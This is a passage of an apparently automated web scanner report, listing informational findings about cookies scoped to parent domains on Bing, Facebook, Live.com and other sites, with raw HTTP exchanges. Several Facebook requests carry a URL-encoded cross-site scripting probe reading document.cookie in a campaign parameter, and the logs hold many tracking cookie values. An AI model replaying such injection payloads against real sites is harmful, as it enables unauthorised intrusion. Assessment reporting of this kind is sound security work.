Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.264. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=A982272C07BD4E90B5DE76723277906D; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2c1f9480a1dd4b8883876429b35f6f0c; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/ryan-seacrest-part-1/17wnurhvy HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68975
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:25 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:25 GMT
Connection: close
Set-Cookie: _SS=SID=A982272C07BD4E90B5DE76723277906D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2c1f9480a1dd4b8883876429b35f6f0c; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.265. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=0A2FC48D77544E149B050D7F74A8325B; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c281ac093fd6548bda49e28e4474b2b6f; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/where-it-all-began/17wv375x2 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68842
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:34 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:34 GMT
Connection: close
Set-Cookie: _SS=SID=0A2FC48D77544E149B050D7F74A8325B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c281ac093fd6548bda49e28e4474b2b6f; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.266. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=1C20FB52E6FA4423ADB90121688D5B2C; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5ccc44826f8244ed9ff22ec7485c1ee5; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 74503
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:28 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:28 GMT
Connection: close
Set-Cookie: _SS=SID=1C20FB52E6FA4423ADB90121688D5B2C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5ccc44826f8244ed9ff22ec7485c1ee5; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

16.267. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
lsd=GX4VM; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

16.268. http://www.facebook.com/HelenASPopkin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HelenASPopkin

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
lsd=rt6y1; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HelenASPopkin HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

16.269. http://www.facebook.com/campaign/impression.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/impression.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dthelastword.msnbc.redacted%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fthelastword.msnbc.redacted%252F%253F1406b%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E2b8d8f3d529%253D1%26extra_2%3DUS; expires=Tue, 01-Mar-2011 12:48:02 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/impression.php?campaign_id=137675572948107&partner_id=thelastword.msnbc.msn.com&placement=like_button&extra_1=http%3A%2F%2Fthelastword.msnbc.redacted%2F%3F1406b%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E2b8d8f3d529%3D1&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=600&action=recommend&colorscheme=light&href=http://thelastword.msnbc.msn.com/_news/2011/01/27/5937356-kind-desk-delivery-update
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS; wd=90x20

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dthelastword.msnbc.redacted%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fthelastword.msnbc.redacted%252F%253F1406b%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E2b8d8f3d529%253D1%26extra_2%3DUS; expires=Tue, 01-Mar-2011 12:48:02 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Sun, 30 Jan 2011 12:48:02 GMT

GIF89a.............!.......,...........D..;

16.270. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
lsd=DtsRk; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

16.271. http://www.facebook.com/todd.kenreck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/todd.kenreck

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
lsd=VUacU; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /todd.kenreck HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

16.272. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hoovers.com
Path:	/business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business-information/--pageid__13823--/global-mktg-index.xhtml HTTP/1.1
Host: www.hoovers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:36 GMT
Server: Apache
Cache-Control: max-age=3600
Expires: Sun, 30 Jan 2011 02:53:36 GMT
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Set-Cookie: HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerholpriv-colo1=1140916490.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/
Content-Length: 18009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Take Th
...[SNIP]...

16.273. http://www.iis.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iis.net
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CSAnonymous=m0d2Yg7AywEkAAAAYzgxZWJhOTEtZjliYS00OWY2LWI5MmMtZGY2NmY1Y2VkOWJl0; domain=iis.net; expires=Sat, 29-Jan-2011 23:43:52 GMT; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.iis.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 34019
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: CSAnonymous=m0d2Yg7AywEkAAAAYzgxZWJhOTEtZjliYS00OWY2LWI5MmMtZGY2NmY1Y2VkOWJl0; domain=iis.net; expires=Sat, 29-Jan-2011 23:43:52 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
The Official M
...[SNIP]...

16.274. http://www.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.live.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; domain=.live.com; path=/
mktstate=S=821848180&U=&E=&P=&B=en-us; domain=.live.com; path=/
mkt1=norm=en-us; domain=.live.com; path=/
E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; domain=.live.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.live.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; LD=3871a7c5-0acf-46b1-b76d-faebaecf0536_00d7c3a81b1_15501_1294800676304=L5708&3871a7c5-0acf-46b1-b76d-faebaecf0536_00e1e3469a5_15501_1294800680668=L3088|U46904782&3871a7c5-0acf-46b1-b76d-faebaecf0536_00ea893c9b1_15501_1294800680555=L3271~sw:1920~sh:1200~c:16~bw:1142~bh:750&3871a7c5-0acf-46b1-b76d-faebaecf0536_00a12627c20_15501_1294800670164=U46914446&3871a7c5-0acf-46b1-b76d-faebaecf0536_004401fc3dc_15501_1294800633344=U46951808&3871a7c5-0acf-46b1-b76d-faebaecf0536_00b4d7765d1_15501_1294800671751=U46913589

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.www.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:28:44 GMT; path=/
Set-Cookie: E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 05-Feb-2011 23:08:44 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:08:44 GMT
Content-Length: 345

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wrep
...[SNIP]...

16.275. http://www.morningstar.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.morningstar.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

fp=015129635244395354; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.morningstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: private
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /IntroPage.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:54:03 GMT
Connection: close
Set-Cookie: fp=015129635244395354; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/
Set-Cookie: IntroAd=true; domain=morningstar.com; expires=Sun, 30-Jan-2011 19:54:03 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fIntroPage.aspx">here</a>.</h2>
</body></html>

16.276. http://www.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=redacted; expires=Sat, 12-Feb-2011 23:26:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher
Host: www.redacted

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:26:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA39
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; domain=www.redacted; expires=Tue, 01-Feb-2011 23:26:28 GMT; path=/
Set-Cookie: expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=redacted; expires=Sat, 12-Feb-2011 23:26:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
ntCoent-Length: 86107
Content-Length: 86107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...

